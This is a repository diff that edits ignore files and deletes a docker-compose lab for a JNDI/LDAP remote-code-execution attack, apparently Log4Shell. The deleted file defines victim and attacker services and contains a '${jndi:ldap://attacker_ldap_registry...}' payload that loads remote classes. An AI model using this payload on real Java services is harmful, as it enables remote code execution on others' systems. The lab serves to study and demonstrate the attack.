4 changed files with 13 additions and 75 deletions
@ -1,5 +1,7 @@ |
|||
# Ignore Gradle build output |
|||
*.log |
|||
build/ |
|||
|
|||
# Ignore Gradle metadata |
|||
.gradle/ |
|||
.git |
|||
.gitignore |
|||
.idea |
|||
.vscode |
|||
|
|||
@ -1,8 +1,5 @@ |
|||
# Log file |
|||
*.log |
|||
|
|||
# Ignore any folders labeled build/ |
|||
build/ |
|||
|
|||
# Ignore Gradle metadata |
|||
.gradle/ |
|||
.idea |
|||
.vscode |
|||
|
|||
@ -1,66 +0,0 @@ |
|||
version: "3" |
|||
services: |
|||
|
|||
# The service on which to gain RCE |
|||
victim: |
|||
build: |
|||
context: ${PWD}/src/victim/ |
|||
dockerfile: ${PWD}/docker/gradle-app.Dockerfile |
|||
args: |
|||
APP_NAME: "victim" |
|||
environment: |
|||
JAVA_OPTS: >- |
|||
-Dvictim-payload=$${jndi:ldap://attacker_ldap_registry:1389/cn=made-class,dc=ldap-registry,dc=attacker} |
|||
depends_on: |
|||
- attacker_ldap_registry |
|||
- attacker_ldap_registry_setup |
|||
- attacker_codebase |
|||
|
|||
# The attacker hosts a server which the victim can use to look up the location |
|||
# of the code to execute. Specifically, the directory server will contain a |
|||
# `Reference` containing a factory class to use to construct an object. This |
|||
# factory class is executed on the victim, giving RCE. |
|||
# |
|||
# Many frameworks can be used for this, including RMI and CORBA. We just use |
|||
# an LDAP server. |
|||
attacker_ldap_registry: |
|||
image: "bitnami/openldap:2.5" |
|||
environment: |
|||
LDAP_PORT_NUMBER: "1389" |
|||
LDAP_ROOT: "dc=ldap-registry,dc=attacker" |
|||
LDAP_ADMIN_USERNAME: "admin" |
|||
LDAP_ADMIN_PASSWORD: "admin" |
|||
LDAP_USERS: "nobody" |
|||
LDAP_PASSWORDS: "nobody" |
|||
LDAP_GROUP: "users" |
|||
LDAP_EXTRA_SCHEMAS: "cosine,inetorgperson,nis,java,corba" |
|||
LDAP_ALLOW_ANON_BINDING: "yes" |
|||
ports: |
|||
- "1389:1389" |
|||
|
|||
# The LDAP registry must be initialized with data. The `Reference` must be |
|||
# placed into the directory. This could easily be done with an LDIF file on |
|||
# bootstrap, but we write a Kotlin program to do that for us. |
|||
attacker_ldap_registry_setup: |
|||
build: |
|||
context: ${PWD}/src/attacker_ldap_registry_setup/ |
|||
dockerfile: ${PWD}/docker/gradle-app.Dockerfile |
|||
args: |
|||
APP_NAME: "attacker_ldap_registry_setup" |
|||
environment: |
|||
JAVA_OPTS: >- |
|||
-Dattacker-ldap-registry-url=ldap://attacker_ldap_registry:1389/dc=ldap-registry,dc=attacker |
|||
-Dattacker-codebase-url=http://attacker_codebase:80/ |
|||
depends_on: |
|||
- attacker_ldap_registry |
|||
|
|||
# The victim needs to know the classes of the objects the attacker feeds it. |
|||
# In Java parlance, the victim needs to know the "codebase" of the attacker. |
|||
# We set that up here. This HTTP server will host the `.class` files needed by |
|||
# the victim for remote code execution. |
|||
attacker_codebase: |
|||
build: |
|||
context: ${PWD}/src/attacker_codebase |
|||
dockerfile: ${PWD}/docker/gradle-java-codebase.Dockerfile |
|||
ports: |
|||
- "8080:80" |
|||
Loading…
Reference in new issue